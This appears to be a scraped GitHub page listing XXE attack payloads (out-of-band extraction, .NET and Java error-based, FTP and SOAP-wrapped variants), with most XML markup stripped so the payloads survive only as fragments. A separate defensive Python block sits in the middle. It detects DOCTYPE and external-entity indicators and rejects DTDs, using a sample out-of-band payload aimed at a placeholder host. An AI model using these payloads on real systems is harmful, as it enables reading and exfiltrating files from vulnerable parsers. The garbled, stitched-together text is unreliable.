XXE Payloads

July 7, 2016 · View on GitHub


Vanilla, used to verify outbound XXE or blind XXE

]> &sp;


OoB extraction

%sp; %param1; ]> &exfil;

External dtd:

">

OoB variation of above (seems to work better against .NET)

%sp; %param1; %exfil; ]>

External dtd:

">

OoB extraction

%sp; %param3; %exfil; ]>

External dtd:

">

OoB extra ERROR -- Java

%sp; %param3; %exfil; ]>

External dtd:

'> %param1; %external;

OoB extra nice

">

%dtd; ]> &all;

External dtd:


File-not-found exception based extraction

%one; %two; %four; ]>

External dtd:

">

-------------------------^ you might need to encode this % (depends on your target) as: %


FTP

%asd; %c; ]> &rrr;

External dtd:

">

Inside SOAP body

soap:Body %dtd;]>]]></soap:Body>
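From the defender's side, the common thread in every variant above is the same: a DOCTYPE carrying an external (SYSTEM/PUBLIC) entity, a parameter-entity reference such as `%sp;`, and sometimes a CDATA wrapper inside a SOAP body so the outer parser never sees the DTD. The following added example (not code from the original page) scans raw request text for those indicators, normalises the numeric character references for `%` that the "encode this %" note alludes to, and shows the blunt mitigation of refusing any document that declares a DOCTYPE before it reaches a parser. The sample documents and the `.invalid` host are constructed for the example.

```python
import re
from xml.etree import ElementTree as ET

# Constructed samples (not from the original page). OOB_STYLE mirrors the
# external-DTD / parameter-entity shape of the OoB payloads; the URL is a placeholder.
BENIGN = '<?xml version="1.0"?><order><id>42</id></order>'
OOB_STYLE = ('<?xml version="1.0"?><!DOCTYPE data [<!ENTITY % sp SYSTEM '
             '"http://dtd-host.invalid/oob.dtd"> %sp;]><data>&exfil;</data>')
# The same document smuggled through a CDATA section inside a SOAP body.
SOAP_WRAPPED = ('<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">'
                '<soap:Body><![CDATA[' + OOB_STYLE + ']]></soap:Body></soap:Envelope>')

DOCTYPE_RE = re.compile(r'<!DOCTYPE\b', re.I)
EXT_ENTITY_RE = re.compile(r'<!ENTITY\s+(%\s+)?(\w+)\s+(?:SYSTEM|PUBLIC)\b', re.I)
PARAM_REF_RE = re.compile(r'%\w+;')
# Numeric character references for '%' (decimal 37 / hex 25); normalise them
# so an encoded parameter-entity reference is matched like a literal one.
PCT_REF_RE = re.compile(r'&#(?:37|x25);', re.I)


def inspect_xml(doc: str) -> dict:
    """Scan raw XML text (CDATA contents included) for XXE indicators."""
    text = PCT_REF_RE.sub('%', doc)
    ext = EXT_ENTITY_RE.findall(text)  # [(pct_marker_or_empty, entity_name), ...]
    findings = {
        'doctype': bool(DOCTYPE_RE.search(text)),
        'external_entities': [name for _, name in ext],
        'parameter_entities': [name for pct, name in ext if pct],
        'parameter_refs': sorted(set(PARAM_REF_RE.findall(text))),
    }
    findings['suspicious'] = findings['doctype'] and bool(ext or findings['parameter_refs'])
    return findings


def parse_safely(doc: str) -> ET.Element:
    """Refuse any DTD outright (the 'disallow DOCTYPE' stance), then parse."""
    if DOCTYPE_RE.search(doc):
        raise ValueError('DOCTYPE declarations are not accepted')
    return ET.fromstring(doc)


def is_rejected(doc: str) -> bool:
    """True when parse_safely refuses or fails to parse the document."""
    try:
        parse_safely(doc)
    except (ValueError, ET.ParseError):
        return True
    return False
```

Because the scan runs over the raw text rather than a parsed tree, it also flags the SOAP case, where the envelope parses cleanly and the DTD only appears when the CDATA payload is handed to a second parser.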


Untested - WAF Bypass